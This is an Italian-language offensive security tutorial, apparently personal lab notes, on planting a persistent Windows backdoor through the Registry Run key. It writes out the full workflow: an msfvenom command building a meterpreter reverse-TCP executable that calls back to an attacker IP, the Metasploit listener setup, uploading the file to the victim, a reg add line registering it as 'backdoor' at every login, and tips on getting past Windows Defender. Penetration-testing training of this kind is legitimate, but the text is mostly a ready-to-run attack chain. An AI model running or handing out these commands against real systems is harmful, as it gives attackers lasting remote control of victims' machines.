tags: Persistenza Persistenza_Windows Powershell_Backdoor


Persistenza via Registry Run

Crea il payload con msfvenom (Sulla tua macchina Attaccante)

Apri un terminale sulla tua macchina (Kali/Parrot) e genera l’eseguibile.
Attenzione: L’IP (LHOST) deve essere l’IP della tua macchina attaccante che la vittima deve poter raggiungere.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.13 LPORT=4444 -f exe -o registry.exe

Per creare una backdoor che si attiva ogni volta che il computer viene riavviato possiamo seguire i seguenti passaggi a partire da una sessione meterpreter con privilegi di amministratore:

 Carica il file sulla macchina Vittima

Devi trasferire registry.exe dalla tua macchina alla vittima. Usa il comando upload direttamente dentro Meterpreter:

upload /percorso/dove/hai/salvato/registry.exe C:\\Users\\Admin\\Downloads\\

Controllo (dentro la shell della vittima): Verifica che il file ci sia e che non sia stato cancellato da Windows Defender:

dir C:\Users\Admin\Downloads\registry.exe

Se il file non c’è o è stato messo in quarantena, dovrai disabilitare temporaneamente il Defender (per esercitazione) o firmare il payload.

Avviare il listener in Metasploit

Prima di fare qualsiasi cosa sulla vittima, metti in ascolto il Metasploit. Se avvii il listener dopo, il payload potrebbe tentare di connettersi e fallire.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.1.13   #(stesso IP che hai messo in msfvenom!)
set LPORT 4444          #(stessa porta che hai messo in msfvenom!)
exploit -j              #(il -j lo manda in background, così non blocchi il terminale)

Se vuoi vederlo in primo piano, usa solo exploit, ma tieni presente che rimarrà in attesa.

Innestare il file malevolo nel riavvio Windows

 
shell   # Per uscire da meterpreter, che usa altri comandi.
 
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v backdoor /t REG_EXPAND_SZ /d "C:\Users\Admin\Downloads\registry.exe"
 

Se la vittima ha più utenti, puoi usare sia HKLM (che parte per tutti) che HKCU (che parte per il singolo utente).

TEST IMMEDIATO – Esegui il file manualmente

Per non aspettare il riavvio, esegui subito il file dalla shell della vittima per verificare che payload + rete + listener funzionino perfettamente:

C:\Users\Admin\Downloads\registry.exe

Cosa succede ora?

  • Se tutto funziona, nella tua console Metasploit (dove hai messo il listener) vedrai comparire una nuova sessione Meterpreter (es. [*] Sending stage...).

  • Se non compare, fermati qui. Non è un problema di persistenza, ma di payload/rete. Verifica:

    • La vittima può pingare il tuo IP? (ping 10.10.1.13)

    • Hai impostato l’IP giusto in msfvenom e nel listener? (Devono essere identici).

Se invece tutto funziona correttamente dal nostro listener dovrebbe apparire la reverse shell come nella seguente immagine:

Adesso ogni volta che l’utente si loggerà triggererà la nostra reverse shell.